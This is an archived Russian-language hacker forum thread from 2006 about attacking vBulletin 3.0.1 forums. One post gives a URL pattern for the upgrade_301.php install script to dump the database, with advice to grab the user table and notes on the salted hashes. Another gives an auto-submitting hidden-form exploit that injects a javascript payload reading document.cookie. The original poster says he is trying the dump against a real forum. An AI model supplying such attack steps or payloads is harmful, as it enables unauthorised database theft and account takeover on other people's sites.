PDA

Просмотр полной версии : Вопрос про уязвимости в vbulletin 3.0.1


Manoz
03.08.2006, 20:52
Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
Спасиб ;)

max_pain89
03.08.2006, 21:12
скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз

LoneWolf666
03.08.2006, 22:01
www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
Возможность сделать дамп базы.
Относительно стабильно работает на 3.0.1.

*либо www.forum.site.domen либо www.site.domen/forum/...
Попробуй.
Хеши - солёные. Соль - последния столбец таблицы.
Если покатит - советую делать дамп таблицы user (мэйби vb_user)
Будет проще, меньше размером, да и нах тебе остальное?

Manoz
08.08.2006, 20:24
Ща попробую! Спасибо за инфу! ++

Эх жалко. Действительно 3.0.1 мулька. =(

BlackCats
08.08.2006, 21:20
а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"

JIaMo
09.11.2006, 19:42
а есть тут еще уязвимости??

_Great_
09.11.2006, 20:11
где тут? в этой версии?

_GaLs_
10.11.2006, 19:16
а есть тут еще уязвимости??

Программа: vBulletin 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

JIaMo
10.11.2006, 21:51
и че с этим делать?

+toxa+
11.11.2006, 00:41
На хер намотай...

JIaMo
11.11.2006, 14:14
спасиб блин